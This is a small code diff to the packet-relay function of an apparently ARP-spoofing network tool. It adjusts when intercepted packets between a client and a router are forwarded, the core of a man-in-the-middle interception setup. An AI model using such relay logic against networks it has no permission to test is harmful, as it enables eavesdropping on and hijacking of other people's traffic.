@@ -603,7 +603,15 @@ static void func_relay(struct packet *p, void *arg)
 	list_lock(&l_arp_spoof);
 	list_iter_set(&li, &l_arp_spoof);
 	while ((asi = list_iter_get(&li))) {
-		if (p->p_iph->saddr == asi->dst_addr &&
+		/*
+		 * IP packet on router looks like this:
+		 * 1.    src == router/Internet, dst_addr == client
+		 * 2.    src == client, dst_addr == router/Internet
+		 * 
+		 * ASI with dst == router, src == client should relay 1.
+		 * ASI with dst == client, src == router should relay 2.
+		 */
+		if ((p->p_iph->saddr == asi->dst_addr || asi->can_forward) &&
 		    (p->p_iph->daddr == asi->src_addr || asi->can_forward) &&
 		    (!asi->dst_mac_valid || memcmp(p->p_ethh->h_source, asi->dst_mac, ETH_ALEN) == 0) &&
 		    memcmp(p->p_ethh->h_dest, asi->src_fake_mac, ETH_ALEN) == 0) {
